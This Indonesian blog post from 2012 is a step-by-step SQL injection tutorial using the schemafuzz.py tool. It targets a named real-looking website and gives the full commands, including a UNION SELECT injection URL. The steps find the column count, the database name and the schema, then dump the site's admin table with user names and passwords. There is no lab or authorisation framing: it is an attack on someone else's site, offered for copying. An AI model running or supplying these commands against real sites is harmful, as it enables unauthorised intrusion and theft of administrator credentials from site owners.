Kamis, 19 April 2012

Tutorial SQLi Injection Dengan Schemafuzz

Assallamualaikum Wr Wb,
Salam sejahtera,
Pada kesempatan kali ini saya akan berbagi tutorial singkat SQLi menggunakan schemafuzz.py.
Oke langsung saja, langkah pertama download schemafuzz DISINI. Langkah berikutnya install python, jika belum ada bisa di download DISINI. Jika python sudah terinstal, langsung jalankan di cmd. Untuk mempermudah silahkan rename schemafuzz.py menjadi root.py dan simpan di Direktori C.
  • Siapkan target, disini saya menggunakan "http://www.perfectpotion.net.cn/article.php?id=36"
  • Buka cmd, ketikkan perintah "cd c:\" lalu "dir" anpa tanda kutip.
  • Kemudian cari jumlah column degnan mengetikan perintah dibawah tanpa tanda kutip, (Lihat Gambar).

    "root.py --findcol -u http://www.perfectpotion.net.cn/article.php?id=36"


    Maka hasilnya akan tampak seperti gambar dibawah :

    Tutorial Schemafuzz
  • Dari gambar di atas bisa kita lihat bahwa jumlah column adalah 20, null column pada column ke-1. Seperti di SQLi manual, column 1 adalah angka ajaib.
  • Langkah selanjutnya mencari nama database. Ketikkan perintah : root.py --dbs -u (darkc0de URL)

    "root.py --dbs -u http://www.perfectpotion.net.cn/article.php?id=36+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19"

    Lihat hasilnya :

    Tutorial SchemafuzzDari gambar di atas sudah terlihat nama database yaitu "yf".
  • Untuk melihat table dan column, kita ketikkan perintah "root.py --schema -u (darkc0de URL) -D (database name)

    "root.py --schema -u http://www.perfectpotion.net.cn/article.php?id=36+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -D yf"

    Tutorial SchemafuzzMaka hasilnya akan tampak dalam gambar berikut :

    Tutorial Schemafuzz
  • Dari gambar di atas sudah terlihat jelas nama table dan column, untuk melihat data dalam column ketikkan perintah "root.py --dump -u (darkc0de URL) -D (database name) -T (table name) -C (column name)

    *Untuk menghindari error dalam pembacaan data, saya hanya akan mengambil data di table "admin" dan column "ID,AdminName,AdminPass" saja.

    "root.py --dump -u http://www.perfectpotion.net.cn/article.php?id=36+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -D yf -T admin -C ID,AdminName,AdminPass"

Maaf, hasilnya tidak akan saya post disini... :D
Mudah-mudahan bermanfaat,
Wassalam,

Tidak ada komentar:

Posting Komentar